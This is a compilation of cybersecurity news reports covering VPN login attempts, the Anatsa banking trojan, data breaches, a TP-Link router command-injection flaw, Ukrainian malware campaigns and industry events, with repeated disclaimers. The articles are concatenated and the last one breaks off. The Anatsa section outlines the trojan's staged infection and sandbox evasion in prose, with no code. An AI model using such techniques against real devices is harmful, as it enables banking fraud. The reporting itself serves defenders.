On May 24, Check Point identified a small number of login attempts using old VPN local accounts that relied on an unrecommended password-only authentication method. The company assembled special teams of Incident Response, Research, Technical Services, and Products professionals to thoroughly investigate these attempts and any other potentially related incidents. Within 24 hours, the teams identified several potential customers who were subject to similar attempts and notified them accordingly. The teams consider password-only authentication methods insecure and more susceptible to the compromise of network infrastructure, recommending against solely relying on these methods when logging into network infrastructure. Several points were advised by the teams as preventative measures, such as:- Reviewing and disabling unused local accounts.
- Implementing an additional layer of authentication, such as certificates, to password-only accounts.
- Deploying additional solutions on Security Gateways to automatically block unauthorized access.
- Contacting the Check Point technical support team or a local representative for additional guidance and assistance.
Implementing Check Point VPN Hotfix
Check Point released a script to identify potential risks of compromise in its VPN environment. Enterprises can download the VPNcheck_v2.zip archive file and follow the steps mentioned on the solution page. If the script identifies local accounts with password-only authentication, users can proceed with the installation of the Security Gateway Hotfix as an option. The hotfix is available via the Check Point Upgrade Service Engine (CPUSE) or through manual download. The Hotfix implements a new command, blockSFAInternalUsers, to the Security Gateway, allowing admins to block or grant access to internal users with password-only authentication. The default value is set to block internal users from connecting with password-only authentication. After installing the hotfix, users who attempt to connect using the weak password-only authentication method will receive a security log indicating the blocked attempt as failed. As remote operations and online threats rise, organizations must prioritize the implementation of tougher VPN authentication methods while monitoring for unauthorized attempts to access these environments. Failure to do so can lead to compromised network infrastructure or assets, data breaches, and significant financial and reputational damage. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.OpenAI Announces Safety and Security Committee Amid New AI Model Development
OpenAI's Safety and Security Committee Composition and Responsibilities
The safety committee comprises company insiders, including OpenAI CEO Sam Altman, Chairman Bret Taylor, and four OpenAI technical and policy experts. It also features board members Adam D’Angelo, CEO of Quora, and Nicole Seligman, a former general counsel for Sony."A first task of the Safety and Security Committee will be to evaluate and further develop OpenAI’s processes and safeguards over the next 90 days."The committee's initial task is to evaluate and further develop OpenAI’s existing processes and safeguards. They are expected to make recommendations to the board within 90 days. OpenAI has committed to publicly releasing the recommendations it adopts in a manner that aligns with safety and security considerations. The establishment of the safety and security committee is a significant step by OpenAI to address concerns about AI safety and maintain its leadership in AI innovation. By integrating a diverse group of experts and stakeholders into the decision-making process, OpenAI aims to ensure that safety and security remain paramount as it continues to develop cutting-edge AI technologies.
Development of the New AI Model
OpenAI also announced that it has recently started training a new AI model, described as a "frontier model." These frontier models represent the most advanced AI systems, capable of generating text, images, video, and human-like conversations based on extensive datasets. The company also recently launched its newest flagship model GPT-4o ('o' stands for omni), which is a multilingual, multimodal generative pre-trained transformer designed by OpenAI. It was announced by OpenAI CTO Mira Murati during a live-streamed demo on May 13 and released the same day. GPT-4o is free, but with a usage limit that is five times higher for ChatGPT Plus subscribers. GPT-4o has a context window supporting up to 128,000 tokens, which helps it maintain coherence over longer conversations or documents, making it suitable for detailed analysis. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Anatsa Banking Trojan Found in PDF and QR Code Reader Apps on Google Play Store
Distribution and Impact of Anatsa Banking Trojan
Two malicious payloads linked to Anatsa were found in the Google Play store, distributed by threat actors. The campaign impersonated PDF reader and QR code reader applications to attract numerous installations. The high number of installations, which had surpassed 70,000 at the time of analysis, further convinced victims of the applications' legitimacy. Anatsa employs remote payloads retrieved from Command and Control (C&C) servers to perform additional malicious activities. The dropper application contains encoded links to remote servers, from which the subsequent stage payload is downloaded. Along with the payload, the malware fetches a configuration file from the remote server to execute the next stage of the attack.Anatsa Infection Steps
The Anatsa banking trojan works by employing a dropper application and executing a payload to launch its malicious activities. Dropper Application:- The fake QR code application downloads and loads the DEX file.
- The application uses reflection to invoke code from the loaded DEX file.
- Configuration for loading the DEX file is downloaded from the C&C server.
- After downloading the next stage payload, Anatsa performs checks on the device environment to detect analysis environments and malware sandboxes.
- Upon successful verification, it downloads the third and final stage payload from the remote server.
- The malware injects uncompressed raw manifest data into the APK, deliberately corrupting the compression parameters in the manifest file to hinder analysis.
- Upon execution, the malware decodes all encoded strings, including those for C&C communication.
- It connects with the C&C server to register the infected device and retrieve a list of targeted applications for code injections.
- After receiving a list of package names for financial applications, Anatsa scans the device for these applications.
- If a targeted application is found, Anatsa communicates this to the C&C server.
- The C&C server then supplies a counterfeit login page for the banking operation.
- This fake login page, displayed within a JavaScript Interface (JSI) enabled web view, tricks users into entering their banking credentials, which are then transmitted back to the C&C server.
Best Practices to Stop the Anatsa Trojan
To protect against such threats, Cyble's Research and Intelligence Labs suggests following essential cybersecurity best practices:- Install Software from Official Sources: Only download software from official app stores like the Google Play Store or the iOS App Store.
- Use Reputable Security Software: Ensure devices, including PCs, laptops, and mobile devices, use reputable antivirus and internet security software.
- Strong Passwords and Multi-Factor Authentication: Use strong passwords and enable multi-factor authentication whenever possible.
- Be Cautious with Links: Be careful when opening links received via SMS or emails.
- Enable Google Play Protect: Always have Google Play Protect enabled on Android devices.
- Monitor App Permissions: Be wary of permissions granted to applications.
- Regular Updates: Keep devices, operating systems, and applications up to date.
Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com
Source: securityboulevard.com – Author: Wajahat Raja Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details […]
La entrada Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Hacker Claims Ticketmaster Data Breach: 560M User Details and Card Info at Risk
Ticketmaster Data Breach: The Worst Time to Have a Cybersecurity Incident
SpidermanData claims to have access to a staggering 560 million records brimming with personally identifiable information (PII) of customers, including sensitive payment card details. This breach couldn't have come at a worse time for Ticketmaster, coinciding with the onset of several major music festivals scheduled between May 2024 and January 2025. Among these highly anticipated events is the FOREIGNER concert, featuring legendary rock acts led by Mick Jones and Kelly Hansen. The musical act will begin on June 11, 2024, in the United States and will conclude on November 9, 2024. Following suit is the iconic band HEART, set to perform across the United States from July to November 2024, culminating in an international concert in Calgary, AB, Canada. Meanwhile, Allison Russell and Hozier are primed to perform from May to August 2024. Adding to this list of bands performing this year, artists like Ian Munsick, Prateek Kuhad, and Kathleen Hanna will also go on tours across North America between 2024 and 2025. However, the jubilant atmosphere surrounding these events is now overshadowed by the threat of, one of the biggest data breaches, threatening millions of users globally. The purportedly compromised data, amounting to a staggering 1.3 terabytes, has been divided into 15 parts, with the hacker offering samples from two segments. One dataset, extracted from a 'PATRON' database, contains a plethora of personal information, including names, addresses, emails, and phone numbers. Meanwhile, the other dataset includes information about customer sales, encompassing crucial details like event IDs and payment methods.The Aftermath and Industry Implications
SpidermanData has listed the entire dataset for sale, quoting a hefty price tag of USD 500,000, and restricting the sale to a single buyer. The gravity of this situation cannot be overstated, with the compromised data posing significant risks of identity theft, financial fraud, and other criminal activities - something we've already seen in previous data breaches like the MOVEit File Transfer incident. Live Nation Entertainment, the parent company of Ticketmaster, stands as a global juggernaut in the live entertainment domain, organizing and promoting thousands of shows annually across more than 40 countries. Meanwhile, Ticketmaster's pivotal role in facilitating ticket sales for musical and non-musical events highlights its significance within the industry, making it a prime target for cybercriminals seeking to exploit vulnerabilities for personal gain. The current Ticketmaster data breach is not the first time that the organization has faced a cyberattack. In November 2020, the company faced a hefty £1.25 million fine from the Information Commissioner's Office (ICO) following a payment data breach in 2018. The breach, stemming from a vulnerability in a third-party chatbot, compromised the personal and payment details of over nine million customers in Europe, triggering widespread fraud and financial losses. Whether the current data breach represents a resurgence of previously compromised data or the acquisition of freshly stolen data, the premise origin of the information about the databases remains unclear. Nevertheless, The Cyber Express will be closely monitoring the situation and we’ll update this post once we have more information on the Ticketmaster data leak or any official confirmation from the organization. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Cencora Data Breach Far More Widespread than Earlier Thought
- AbbVie Inc.
- Acadia Pharmaceuticals Inc.
- Bayer Corporation
- Bristol Myers Squibb Company and Bristol Myers Squibb Patient Assistance Foundation
- Dendreon Pharmaceuticals LLC
- Endo Pharmaceuticals Inc.
- Genentech, Inc.
- GlaxoSmithKline Group of Companies and the GlaxoSmithKline Patient Access Programs Foundation
- Incyte Corporation
- Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.
- Novartis Pharmaceuticals Corporation
- Pharming Healthcare, Inc.
- Regeneron Pharmaceuticals, Inc.
- Sumitomo Pharma America, Inc. / Sunovion Pharmaceuticals Inc.
- Tolmar
Cyber Forensic Findings from the Cencora Data Breach
Cencora detected the cyberattack on February 21, and took immediate action to contain and prevent further unauthorized access. Based on the investigation that likely concluded in April, Cencora said personal information including first name, last name, address, date of birth, health diagnosis, and medications and prescriptions was compromised in the attack. AmerisourceBergen Specialty Group (ABSG), a unit of Cencora, said Friday the breach involved data of a prescription supply program run by the now defunct subsidiary, Medical Initiatives Inc. Further details on how the supply program was exploited remain unclear. U.S. has been rocked by a host of cybersecurity breaches linked to the healthcare industry in recent days. While Change Healthcare cyberattack was one of the most notable ones, the Medstar and Ascension breaches have displayed the vulnerability of the healthcare sector to cyberattacks. The latest in the list of healthcare data breaches is the Sav-Rx data breach that compromised the health data of more than 2.8 million people. Cencora’s investigation, however, found no connection with other major healthcare cyberattacks and, in its notifications, said they were unaware of any actual or attempted misuse of the stolen data. The company said it has not seen any public disclosure of the stolen data, till date. The affected individuals have been offered 24 months of credit monitoring and identity theft remediation services at no cost and steps have also been taken to harden defenses to prevent such security breaches in the future. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Greek PDPA Fines Ministry of Interior and MEP Asimakopoulou in ‘Email-Gate’ Scandal
Ministry of Interior Violations and Consequences
The authority found that a file of 25,000 voters registered for the June 2023 elections had been leaked between June 8 and 23, 2023. The list, which included voter emails, was sent to New Democracy's then Secretary for Diaspora Affairs, Nikos Theodoropoulos, by an unknown individual. Theodoropoulos forwarded the file to MEP Asimakopoulou, who used it to send mass campaign emails in violation of data protection laws and basic principles of legality. [caption id="attachment_71501" align="alignnone" width="1000"] Source: Shutterstock (MEP Anna-Michelle Asimakopoulou)[/caption] On receiving the unsolicited emails to their private accounts, several Greek diaspora voters living abroad expressed their surprise on social media and accused the New Democracy MEP of violating the European Union’s General Data Protection Regulation (GDPR). The expats questioned how the addresses were obtained by the MEP for use in the email campaigns. Asimakopoulou earlier attempted to refute allegations of violating these data protection laws but was found to provide contradictory explanations regarding the source from which these addresses were obtained for usage in the mass email campaign. As a result, the Ministry of Interior faces a 400,000-euro fine, while Asimakopoulou faces a 40,000-euro fine. The authority also postponed its verdict on Theodoropoulos and the New Democracy party to examine new claims related to the investigation. The PDPA stated in its investigation that the use of the emails, “was in violation of the basic principle of legality, objectivity and transparency of processing, as it was in violation of a series of provisions of the electoral legislation and furthermore could not reasonably be expected.” The ministry said it will "thoroughly study" the authority's decision to consider further legal actions. The "email-gate" scandal has led to significant consequences, including the resignation of the general secretary of the Interior Ministry, Michalis Stavrianoudakis, and the dismissal of Theodoropoulos by New Democracy. Asimakopoulou has announced she will not run in the European Parliament elections. Asimakopoulou is also facing 75 lawsuits by citizens and over 200 lawsuits from the Interior Ministry, over the scandal.Reaction of Opposition Parties to the Investigation Results
Opposition parties are now demanding the resignation of Interior Minister Niki Kerameos following the outcome of the investigation into the unsolicited emails. [caption id="attachment_71241" align="alignnone" width="1000"] Source: Shuttertock (Interior Minister Niki Kerameos)[/caption] The main opposition party SYRIZA released a statement asserting that “private data were being passed around for months among the Interior Ministry, ND, and at least one election candidate,” questioning whether the email list had been leaked to other New Democracy candidates by the Interior Ministry. While the Interior Minister might not have been directly involved, SYRIZA claimed that “Kerameos did not have the guts to show up at the Committee on Institutions and Transparency.” The Socialist PASOK Party also demanded Kerameos’ resignation, adding that the violation demonstrates the government as “incapable of fulfilling the self-evident, as proven by the high fines.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Black Basta Ransomware Attack: Microsoft Quick Assist Flaw
Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details about how this financially motivated group […]
The post Black Basta Ransomware Attack: Microsoft Quick Assist Flaw appeared first on TuxCare.
The post Black Basta Ransomware Attack: Microsoft Quick Assist Flaw appeared first on Security Boulevard.
TP-Link Resolves High-Stakes Vulnerability in Archer C5400X Gaming Router
The Timeline of TP-Link Archer C5400X Vulnerability Exposure
According to ONEKEY Research Lab, the TP-Link Archer C5400X vulnerability was initially reported on February 16, 2024, with the submission of a detailed report to TP-Link's PSIRT. Following the report, TP-Link promptly initiated a case on February 19. [caption id="attachment_71171" align="alignnone" width="1096"] Source: ONEKEY[/caption] After collaborative efforts and validation processes, TP-Link shared a beta version of 1.1.7p1 on April 10 for further testing, culminating in the confirmation and release of the patch by ONEKEY on May 27, 2024. The vulnerability exposed a critical flaw in the TP-Link Archer C5400X gaming router, rendering it susceptible to remote command execution. This exploit granted unauthorized users the ability to execute arbitrary commands on the device, posing security risks to users' data and network integrity. “It seems the need to provide a wireless device configuration API at TP-Link had to be answered either fast or cheap, which ended up with them exposing a supposedly limited shell over the network that clients within the router could use as a way to configure wireless devices”, said OneKey in the advisory.Understanding the TP-Link Archer C5400X Vulnerability
[caption id="attachment_71174" align="alignnone" width="822"] Source: TP-Link[/caption] Central to this TP-Link Archer C5400X vulnerability is the rftest binary, launched during the device's initialization sequence. This binary, responsible for wireless interface self-assessment, inadvertently exposes a network service vulnerable to unauthenticated command injection. Attackers can leverage this vulnerability to remotely execute commands with elevated privileges, potentially compromising the device and its connected network. To mitigate the risk posed by this vulnerability, users are strongly advised to upgrade their devices to version 1_1.1.7. TP-Link has implemented fixes to prevent command injection through shell meta-characters, thereby enhancing the security posture of affected devices. However, users must remain vigilant and proactive in ensuring their devices are up to date with the latest firmware releases to safeguard against emerging threats.Exposing Recent Vulnerabilities in Routers
The TP-Link Archer C5400X router vulnerability is just one of the cases where a flaw was exploited without a third-party breach. Previously, CISA flagged two end-of-life D-Link routers, adding them to their Known Exploited Vulnerabilities catalog. The router vulnerabilities, CVE-2014-100005 and CVE-2021-40655, affected three main products, DIR-600, DIR-605, and DIR-605L. Exploitation of these vulnerabilities allowed unauthorized configuration changes and the theft of usernames and passwords. The Cyber Security Agency of Singapore also stressed these two vulnerabilities, stating that the mitigation strategy to avoid exploitation is to “retire and replace their devices with products that are supported by the manufacturer.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Alert: Google Chrome Zero-Day Patch Fixes Critical Flaw
In recent cybersecurity news, Google has swiftly addressed a critical security concern by releasing an emergency update for its Chrome browser. This update targets the third zero-day vulnerability detected in less than a week. Let’s have a look at the details of this Google Chrome zero-day patch and understand its implications for user safety. […]
The post Alert: Google Chrome Zero-Day Patch Fixes Critical Flaw appeared first on TuxCare.
The post Alert: Google Chrome Zero-Day Patch Fixes Critical Flaw appeared first on Security Boulevard.
Pakistan’s Islamabad’s Safe City Authority Online System Down After Hack
Islamabad's Safe City Authority Breach and Initial Response
The breach revealed several systemic weaknesses within the Safe City Authority's digital infrastructure. Hackers successfully infiltrated the primary server, gaining unauthorized access to databases containing criminal records and sensitive information. While the system's firewall did issue an alert upon detecting the intrusion, the absence of backup servers and contingency plans forced a complete shutdown of the affected software and applications. The assault compromised several integral systems, including the Complaint Management System, Criminal Management Record System, and Human Resource Management System, along with software and applications vital for the Operation Division. [caption id="attachment_70433" align="alignnone" width="2800"] Source: china.aiddata.org[/caption] The compromise of these systems impacted several critical services tied to the Safe City initiative. This includes mobile applications, smart police vehicle records, police station data, video analytics, Islamabad Traffic Police, e-challan systems, and records from the operations division. Approximately 13 to 15 servers provided by the police facilitation center F-6 were also affected. An officer highlighted to Dawn, Pakistan's largest English newspaper, that this incident was not a typical hacking scenario involving stolen login credentials. Instead, the system's vulnerability stemmed from the use of simple and common login IDs and passwords by officials, making it easier for hackers to gain access. Additionally, many of the software and applications were found to be outdated or with expired licenses, further compromising the system's security. Despite the breach of several systems, the Safe City cameras' management system that operated independently through offline direct lines, remained secure, demonstrating the effectiveness of isolated systems in safeguarding against such attacks. Police spokesperson Taqi Jawad confirmed the intrusion as an attempted breach that triggered the firewall's alarm but stated that appropriate precautionary measures had been taken. "All logins have been closed for the past two days to change them, including those of police stations and officers at various ranks," he stated. Jawad refrained from sharing further specifics on the server shutdowns as he stated they were still pending technical feedbackControversy Over Islamabad's Safe City Authority
Islamabad's Safe City project has been a source of serious controversy, with several litigations over contract transparency and cost inflation, leading the Supreme Court's order to cancel the initial contract with Huawei in 2012. The contract was later renegotiated, and the project resumed under the PMLN (Pakistan Muslim League) government, with the command center becoming operational in 2016. By 2016, 1,805 cameras were installed, and as of 2021, 95% remained functional. Despite the extensive infrastructure, police sources claimed in 2022 that the system had not prevented any incidents or facilitated any arrests, raising questions about its effectiveness. Due to financial strain, Pakistan and China Eximbank signed several debt suspension agreements from July 2020 to December 2021, temporarily suspending principal and interest payments under the concessional loan agreement. Tragically, the project's director was found dead in July 2022 in an apparent suicide. The successful breach of the authority's systems draws additional controversy towards the project, which was intended to be a cornerstone of Islamabad's security infrastructure but has encountered several operational, legal, and financial setbacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Federal Court Denies Optus Appeal to Withhold Deloitte Report on 2022 Cyberattack
Optus Appeal Against Sharing External Deloitte Report
The data breach incident along with 14-hour outage of its telecommunication services, frustrations over the availability of information/credit monitoring services and attempts of attackers to exploit the compromised data for use in SMS phishing attacks, led to intense scrutiny towards the company. [caption id="attachment_70354" align="alignnone" width="2230"] Source: www.optus.com.au/support/cyberresponse[/caption] The company commissioned an independent external forensic review of the cyberattack from Deloitte over its security systems, controls and processes under the advise of the then CEO Kelly Bayer Rosmarin and the approval of its board. Bayer made the following statement over the decision:“This review will help ensure we understand how it occurred and how we can prevent it from occurring again. It will help inform the response to the incident for Optus. This may also help others in the private and public sector where sensitive data is held and risk of cyberattack exists.Kelly, later resigned over the incident with Optus now being led by a new CEO, who is working to rebuild trust with customers in a 'challenging' market. Despite the efforts of the company to deal with the data breach, the recent court decision comes after Optus appealed an earlier ruling that it must hand over the report to Slater & Gordon, the law firm pursuing a class action against the company for allegedly failing to protect its customers' personal information. Optus has not yet made a public statement regarding the Federal Court's decision. However, the company had previously argued that the Deloitte report was commissioned to provide legal advice and therefore it was privileged. The court, however, decided that Optus had failed to prove that the dominant purpose of the report was for legal advice.
Class Action Law Suit Against Optus and Implications of Court Ruling
Slater & Gordon, the law firm representing the affected Optus customers, has welcomed the court's decision. The law firm's class actions practice group leader, Ben Hardwick, criticized Optus's efforts to keep the report confidential, stating that it indicates the company's refusal to accept responsibility for its role in the data breach and its impact on millions of its customers. In it's April 2023 press release, the law firm's leader had stated that more than 100,000 of Optus’s current and former customers had registered for the class action, with some notable examples among the group group such as:-
a domestic violence victim who spent money that was intended for counselling for her children on increasing security measures around the house, including installing video cameras and extra locks on doors and windows
-
a former Optus customer who had previously been burgled and had his identity stolen who now suffers severe anxiety after learning his personal information had been shared online
-
a stalking victim who takes extreme measure to maintain her privacy, especially her address, who fears her life has genuinely been put in danger by the data breach
-
a woman who is now too fearful to answer the telephone after noticing an increase in scam phone calls following the Optus cyberattack, and
-
a retired police officer concerned that his home address may have been shared with criminals he was involved in the prosecution and incarceration of.
World Cybercon 3.0 META Awards Celebrate Champions of Cybersecurity in the Middle East
The Cyber Express Cybersecurity Person of 2024 (META): Man
- Thomas Heuckeroth, SVP IT Infrastructure & Digital Platforms, Emirates Group
The Cyber Express Cybersecurity Person of 2024 (META): Woman
- Dr. Hoda A Alkhzaimi, EMaratsec
The Cyber Express Cybersecurity Diversity and Inclusion Advocates of 2024
- Yana Li, WebBeds
- Dina AlSalamen, Bank ABC (Jordan)
- Rudy Shoushany, DxTalks
- Aus Alzubaidi, MBC Group
- Saltanat Mashirova, Honeywell
The Cyber Express Infosec Guardians of 2024 (BFSI)
- Anthony Sweeney, Deribit
- Bipin Mehta, HSBC Bank
- Syed Muhammad Ali Naqvi, HBL Bank
- Kiran Kumar PG, Alpheya
- Ahmed Nabil Mahmoud, Abu Dhabi Islamic Bank
The Cyber Express Infosec Guardians of 2024 (Government & Critical Entities)
- Talal AlBalas from Abu Dhabi Quality and Conformity Council (ADQCC)
- Abdulwahab Abdullah Algamhi, UAE ICP
- Vinoth Inbasekaran, Dubai Government Entity - Alpha Data
- Dr Hamad Khalifa Alnuaimi, Abu Dhabi Police
- Dr Saeed Almarri, Dubai Police
The Cyber Express Top Cybersecurity Influencers of 2024
- Dr. Mohammad Al Hassan, Abu Dhabi University
- Maryam Eissa Alhammadi, Ministry of Interior
- Hadi Anwar, CPX
- Waqas Haider, HBL Microfinance Bank
- Chenthil Kumar, Red Sea International
- Nishu Mittal, Emirates NBD
- Nisha Rani, Emirates Leisure Retail
The Cyber Express Top InfoSec Leaders 2024
- Mohamad Mahjoub, Veolia Near and Middle East
- Ankit Satsangi, Beeah Group
- Gokul Vasudev, Dubai Health Authority
- Ashish Khanna, SHARAF GROUP
- Abhilash Radhadevi, Oq Trading
- Prashant Nair, Airtel Africa PLC
The Cyber Express Top Infosec Entrepreneurs 2024
- May Brooks Kempler, Helena
- Illyas Kooliyankal, CyberShelter
- Kazi Monirul, Spider Digital
- Muneeb Anjum, AHAD
- Craig Bird, CloudTech24
- Zaqiuddin Khan, Tech Experts LLC
- Alireza Shaban ghahrod, Diyako Secure Bow
Insightful Discussions and Networking
The awards set a celebratory tone that carried through the rest of the conference. The day commenced with a vibrant atmosphere as attendees gathered for registration and explored the exhibition area, setting the stage for a day of insightful discussions and networking opportunities. Augustin Kurian, Editor-in-Chief of The Cyber Express, extended a warm welcome, emphasizing the importance of collaborative efforts in cultivating a secure cyber environment.Keynote and Panel Sessions
Irene Corpuz, Co-Founder of Women in Cybersecurity Middle East, delivered the opening keynote, shedding light on the imperative of incubating security and nurturing a cyber-aware culture, particularly within startup ecosystems. Corpuz's address highlighted the significance of proactive measures in addressing cybersecurity challenges from the outset. Panel discussions served as focal points for in-depth exploration of key cybersecurity issues. From navigating cyber threats to leveraging innovative approaches for threat detection, industry experts provided valuable insights into emerging trends and strategic investments in cybersecurity. Notable panelists included Waqas Haider of HBL Microfinance Bank, Beenu Arora of Cyble, and Azhar Zahiruddin of Chalhoub Group, among others.Diversity and Inclusion
The Cyber Express's World CyberCon Meta Edition event also celebrated diversity and inclusion in cybersecurity, honoring advocates who have championed these principles within their respective domains. Yana Li of WebBeds and Dina AlSalamen of Bank ABC were among the esteemed recipients of The Cyber Express Cybersecurity Diversity and Inclusion Advocates of 2024 award, acknowledging their efforts in fostering an inclusive cyber community. Strategic insights were further highlighted during panel discussions focusing on fortifying against ransomware and the role of AI and ML in enhancing threat detection. Expert moderators facilitated engaging conversations, addressing critical challenges and sharing best practices for prevention, mitigation, and swift recovery.Conclusion
The Cyber Express World Cybercon 3.0 META Cybersecurity Conference successfully raised the bar for the collective dedication of cybersecurity professionals in the META region. By fostering dialogue, sharing insights, and recognizing excellence, the event played an important role in advancing cybersecurity resilience and shaping the future of cybersecurity across industries. The Cyber Express awards recognized the hard work and innovative solutions of the finest brains in cybersecurity, emphasizing the message that collaborative and proactive actions are critical to protecting our digital future. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Russian Hackers Use Legit Remote Monitoring Software to Spy on Ukraine and Allies
Possible Defense Against Ongoing Remote Monitoring Campaign
CERT-UA recommends the following:- Organizations not using SuperOps RMM should verify the absence of network activity associated with the domain names: [.]superops[.]com, [.]superops[.]ai.
- Improve employee cyber hygiene.
- Use and constantly update anti-virus software.
- Regularly update operating systems and software.
- Use strong passwords and change them regularly.
- Back up important data.
Ukrainian Financial Institutions Also on Smokeloader’s Radar
The financially motivated group UAC-0006 has actively launched phishing attacks targeting Ukraine through 2023. CERT-UA reported the resurfacing of UAC-0006 in spring 2024, with hackers attempting to distribute Smokeloader, a common malware in the group’s toolkit. This threat group’s goal has primarily been to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems. SmokeLoader is a malicious bot application and trojan that can evade security measures to infect Windows devices. It can then install other malware, steal sensitive data and damage files, among other issues. Throughout 2023, UAC-0006 conducted several phishing campaigns against Ukraine, exploiting financial lures and using ZIP and RAR attachments to distribute Smokeloader CERT-UA last week issued another warning about a significant surge in UAC-0006 activity. Hackers have conducted at least two campaigns to distribute Smokeloader, displaying similar patterns to previous attacks. The latest operations involve emails with ZIP archives containing images that include executable files and Microsoft Access files with macros that execute PowerShell commands to download and run other executable files. After initial access, the attackers download additional malware, including TALESHOT and RMS. The botnet currently consists of several hundred infected computers. CERT-UA anticipates an increase in fraudulent operations involving remote banking systems and thus, strongly recommends enhancing the security of accountants’ automated workstations and ensuring the implementation of necessary policies and protection mechanisms to reduce infection risks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Bitdefender Launches ‘Scamio’ on WhatsApp: A New AI Tool to Combat Online Scams in Australia
Bitdefender’s Scamio is Now Available on WhatsApp in Australia
Bitdefender Scamio is an AI-driven chatbot that analyzes data and provides a verdict within seconds, along with recommendations for further action. Additionally, with this latest integration with WhatsApp, over 7.4M Australian users can use Scamio as their personal scam checker. [caption id="attachment_70308" align="alignnone" width="1200"] Source: Bitdefender[/caption] The integration of Bitdefender’s Scamio with WhatsApp was a strategic response to the increasing use of artificial intelligence by malicious actors. Scammers were exploiting popular messaging apps and online services to steal money, credentials, and personal data. By integrating Scamio into WhatsApp, Bitdefender aimed to disrupt these criminal activities by offering a sophisticated tool capable of keeping pace with online scam tactics. The enhanced accessibility provided by this feature aimed to provide an additional layer of security for Australians, who were disproportionately targeted by online fraudsters. Having Scamio available within WhatsApp streamlined the scam verification process for everyday users, reducing the time and effort required to identify potential scams.How to use Bitdefender’s Scamio for Scam Detection?
In the USA and other countries, online scams remained a major concern, with the number of internet fraud reports rising in recent years. Phishing and online shopping scams were among the most common types reported. To combat this issue, governments intensified efforts to inform the public and assist in preventing internet fraud and scams. Scamio, Bitdefender's next-gen AI chatbot, combined artificial intelligence with exceptional threat-detection algorithms, machine learning, pattern recognition, and advanced data analysis techniques to identify even the most sophisticated scams. Accessible on any device without requiring installation, Scamio helped users quickly verify suspicious links, text messages, emails, and QR codes—all for free. To use this chatbot, users could access the web app or add it as a contact on WhatsApp or Facebook Messenger. Once logged in, users could describe scam details, copy and paste texts or links, or upload pictures or screenshots of deceptive messages. Scamio then analyzed the material and provided recommendations to ensure users didn't fall victim to cybercriminals. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.The Importance of Patching Vulnerabilities in Cybersecurity
One of the most critical yet often overlooked aspects of cybersecurity is the timely patching of vulnerabilities. While much attention is given to sophisticated phishing attacks and the menace of password brute-forcing, the importance of addressing unpatched vulnerabilities cannot be overstated. These vulnerabilities represent low-hanging fruit for cybercriminals, offering a relatively straightforward path into systems. […]
The post The Importance of Patching Vulnerabilities in Cybersecurity appeared first on TuxCare.
The post The Importance of Patching Vulnerabilities in Cybersecurity appeared first on Security Boulevard.
Decoding the Primary Devils Behind Data Breaches
Critical weaknesses behind Data Breaches
Weak and stolen credentials
Although hacking attacks are frequently cited as the leading cause of data breaches, it's often the vulnerability of compromised or weak passwords or personal data that opportunistic hackers exploit. Statistics show that four out of five breaches are partially attributed to the use of weak or stolen passwords. To mitigate the risk of hackers executing an account takeover on sensitive accounts, businesses should consider deploying fraud protection tools. These act as proactive defenses, significantly reducing the likelihood of unauthorized access and enhancing the overall security of your accounts. Bot Managers also address challenges associated with bot traffic on websites and applications. It’s designed to identify, manage, and mitigate both malicious and non-malicious bot traffic, ensuring a more secure and efficient online experience. To further protect your organization, it’s also advisable to implement enterprise single sign-on (SSO), establish strong password hygiene, and set up phishing-resistant multi-factor authentication (MFA) across computer systems — this way, you can prevent personally identifiable information from getting into the wrong person’s hands.Backdoor and application vulnerabilities
Exploiting backdoor and application vulnerabilities is a favored strategy among cybercriminals. When software applications are poorly written or network systems are inadequately designed, hackers will continuously probe for weaknesses to find open doors that grant them direct access to valuable data and confidential information. Ensuring your web application firewall (WAF) is regularly updated and well-managed helps mitigate these vulnerabilities. Due to constantly shifting attack techniques, organizations should also use advanced artificial intelligence (AI) powered security solutions to identify vulnerabilities and protect against unauthorized access. The WAF should be a robust security solution designed to protect web applications from a variety of cyber threats, including data breaches. It can serve as a barrier between web applications and the internet, scrutinizing and filtering HTTP traffic to identify and mitigate potential vulnerabilities and attacks.Malware
